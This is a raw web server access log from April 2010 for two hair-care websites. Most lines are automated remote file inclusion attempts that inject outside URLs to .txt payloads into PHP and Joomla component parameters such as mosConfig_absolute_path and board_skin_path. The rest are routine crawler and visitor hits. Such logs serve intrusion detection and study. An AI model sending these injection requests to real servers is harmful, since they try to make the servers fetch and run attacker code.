222.231.60.209 - - [26/Apr/2010:07:56:25 -0700] "GET /logs/access_100104.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:37 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:37 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [26/Apr/2010:07:56:40 -0700] "GET /logs/access_100104.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:07:59:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13153 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:08:03:49 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:08:03:50 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.107.48.3 - - [26/Apr/2010:08:03:50 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:08:05:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13301 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
123.143.98.5 - - [26/Apr/2010:08:05:27 -0700] "GET /logs/write.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.143.98.5 - - [26/Apr/2010:08:05:27 -0700] "GET /logs/access_100118.log%20%20/write.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.143.98.5 - - [26/Apr/2010:08:05:28 -0700] "GET /write.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:08:05:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4976 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
216.129.119.41 - - [26/Apr/2010:08:07:57 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.freehairsecrets.com"
118.129.170.49 - - [26/Apr/2010:08:08:47 -0700] "GET /bbs//write_update.php?board_skin_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [26/Apr/2010:08:08:47 -0700] "GET /logs/access_100301.log%20%20//bbs//write_update.php?board_skin_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [26/Apr/2010:08:08:47 -0700] "GET /logs//bbs//write_update.php?board_skin_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [26/Apr/2010:08:08:56 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.212.226.210 - - [26/Apr/2010:08:08:56 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
118.129.170.49 - - [26/Apr/2010:08:09:07 -0700] "GET /logs/access_100301.log%20%20//bbs//write_update.php?board_skin_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [26/Apr/2010:08:09:08 -0700] "GET /bbs//write_update.php?board_skin_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [26/Apr/2010:08:09:08 -0700] "GET /logs//bbs//write_update.php?board_skin_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [26/Apr/2010:08:09:38 -0700] "GET /logs/access_100412.log%20%20//bbs//write_update.php?board_skin_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.170.49 - - [26/Apr/2010:08:09:39 -0700] "GET /logs/access_100412.log%20%20//bbs//write_update.php?board_skin_path=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:08:12:35 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:08:12:35 -0700] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:08:12:35 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.172.232.251 - - [26/Apr/2010:08:12:45 -0700] "GET /logs/access_100125.log/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:08:12:46 -0700] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:08:12:47 -0700] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it//eng/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:08:13:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13316 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
72.46.157.102 - - [26/Apr/2010:08:16:03 -0700] "GET /logs/access_100412.log//components/com_flyspray/startdown.php?file=http://compas.ru//poll/polldata/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.46.157.102 - - [26/Apr/2010:08:16:03 -0700] "GET /components/com_flyspray/startdown.php?file=http://compas.ru//poll/polldata/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.46.157.102 - - [26/Apr/2010:08:16:03 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://compas.ru//poll/polldata/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:08:16:07 -0700] "GET /logs/access_100125.log/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:08:16:08 -0700] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.172.232.251 - - [26/Apr/2010:08:16:09 -0700] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
91.212.226.210 - - [26/Apr/2010:08:20:06 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "freehairsecrets.com"
91.212.226.210 - - [26/Apr/2010:08:20:07 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:08:20:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13358 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:08:22:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13161 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
210.127.253.75 - - [26/Apr/2010:08:23:07 -0700] "GET /logs/access_100125.log/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
210.127.253.75 - - [26/Apr/2010:08:23:07 -0700] "GET /com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
210.127.253.75 - - [26/Apr/2010:08:23:08 -0700] "GET /logs/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www2.beppegrillo.it/lcwiki/maintenance/postgres/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
211.220.193.170 - - [26/Apr/2010:08:26:21 -0700] "GET /logs/access_100301.log//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [26/Apr/2010:08:26:21 -0700] "GET /bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.220.193.170 - - [26/Apr/2010:08:26:21 -0700] "GET /logs//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:08:27:07 -0700] "GET /logs/access_100301.log//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:08:27:08 -0700] "GET /bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.97.196 - - [26/Apr/2010:08:27:08 -0700] "GET /logs//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.124.182.252 - - [26/Apr/2010:08:27:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=631&sid=0bbdde56fc1c8631ab837793a5241ad3 HTTP/1.0" 200 438 "http://growlonghairfast.com/freehairsecretsphp/viewtopic.php?p=631&sid=0bbdde56fc1c8631ab837793a5241ad3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
204.124.182.252 - - [26/Apr/2010:08:27:12 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
119.63.198.50 - - [26/Apr/2010:08:28:14 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:08:30:16 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:08:30:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13990 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
118.217.216.132 - - [26/Apr/2010:08:34:23 -0700] "GET /bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [26/Apr/2010:08:34:24 -0700] "GET /logs//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [26/Apr/2010:08:34:24 -0700] "GET /logs/access_100301.log//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:08:34:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13317 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
208.80.193.40 - - [26/Apr/2010:08:35:09 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Avant Browser; .NET CLR 1.1.4322)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:08:37:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14667 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:08:40:40 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:08:40:40 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:08:40:40 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:08:43:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14006 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
118.217.216.132 - - [26/Apr/2010:08:48:53 -0700] "GET /logs//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [26/Apr/2010:08:48:53 -0700] "GET /bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.217.216.132 - - [26/Apr/2010:08:48:53 -0700] "GET /logs/access_100301.log%20%20//bbs/////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:08:49:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13233 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:08:51:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7593 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
41.202.193.153 - - [26/Apr/2010:08:54:23 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "growlonghairfast.com"
41.202.193.153 - - [26/Apr/2010:08:54:32 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "growlonghairfast.com"
41.202.193.153 - - [26/Apr/2010:08:55:56 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:08:59:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14575 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.202.23.192 - - [26/Apr/2010:09:00:42 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
67.202.23.192 - - [26/Apr/2010:09:00:43 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13250 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
41.202.193.153 - - [26/Apr/2010:09:01:35 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:09:03:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13339 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:09:04:20 -0700] "GET /logs/access_100412.log%20%20//?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:09:04:20 -0700] "GET /?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:09:04:20 -0700] "GET /logs//?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:09:04:22 -0700] "GET /logs/access_100412.log%20%20//?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:09:04:22 -0700] "GET /logs//?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:09:04:22 -0700] "GET /?mosConfig_absolute_path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
41.202.193.153 - - [26/Apr/2010:09:05:00 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "growlonghairfast.com"
41.202.193.153 - - [26/Apr/2010:09:05:16 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "http://growlonghairfast.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "growlonghairfast.com"
41.202.193.153 - - [26/Apr/2010:09:05:29 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "http://growlonghairfast.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:09:05:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4943 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:09:06:24 -0700] "GET /logs/access_100104.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:24 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:39 -0700] "GET /logs/access_100405.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:44 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:44 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:44 -0700] "GET /logs/access_100104.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.80.193.37 - - [26/Apr/2010:09:06:44 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; Hotbar 4.2.8.0)" "freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:09:06:46 -0700] "GET /logs/access_100329.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:50 -0700] "GET /logs/access_100405.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:53 -0700] "GET /logs/access_100329.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:57 -0700] "GET /logs/access_100322.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:06:57 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:07:05 -0700] "GET /logs/access_100322.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:07:05 -0700] "GET /logs/access_100315.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:09:08:01 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jsandbox.brianwahlband.com/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
